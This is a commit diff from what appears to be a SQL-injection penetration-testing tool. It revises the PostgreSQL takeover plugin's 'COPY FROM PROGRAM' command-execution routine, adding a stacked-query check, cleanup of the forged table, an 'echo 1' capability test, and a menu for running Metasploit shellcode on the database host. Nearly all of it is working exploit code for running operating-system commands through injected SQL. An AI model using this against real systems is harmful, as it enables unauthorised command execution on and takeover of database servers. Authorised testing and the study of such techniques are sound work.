Finalizing #3545

2025-12-07 21:21:33 +00:00 · 2019-03-22 13:49:52 +01:00
parent 5ced273b8a
commit 2d129f3e58
6 changed files with 50 additions and 16 deletions
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -10,6 +10,8 @@ import os
 from lib.core.common import Backend
 from lib.core.common import checkFile
 from lib.core.common import decloakToTemp
+from lib.core.common import isListLike
+from lib.core.common import isStackingAvailable
 from lib.core.common import randomStr
 from lib.core.data import kb
 from lib.core.data import logger
@@ -104,13 +106,28 @@ class Takeover(GenericTakeover):
        self.cleanup(onlyFileTbl=True)

    def copyExecCmd(self, cmd):
-        # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
-        self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
-        self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
-        self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
-        inject.goStacked(self._forgedCmd)
+        output = None

-        query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
-        output = inject.getValue(query, resumeValue=False)
+        if isStackingAvailable():
+            # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+            self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
+            self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
+            self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
+            inject.goStacked(self._forgedCmd)
+
+            query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
+            output = inject.getValue(query, resumeValue=False)
+
+            if isListLike(output):
+                output = os.linesep.join(output)
+
+            self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
+            inject.goStacked(self._cleanupCmd)

        return output
+
+    def checkCopyExec(self):
+        if kb.copyExecTest is None:
+            kb.copyExecTest = self.copyExecCmd("echo 1") == '1'
+
+        return kb.copyExecTest
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -140,6 +140,9 @@ class Miscellaneous:
        if not isStackingAvailable() and not conf.direct:
            return

+        if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest:
+            return
+
        if Backend.isOs(OS.WINDOWS):
            libtype = "dynamic-link library"

--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -169,7 +169,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                    msg = "how do you want to execute the Metasploit shellcode "
                    msg += "on the back-end database underlying operating system?"
                    msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
-                    msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)"
+                    msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"

                    while True:
                        choice = readInput(msg, default='1')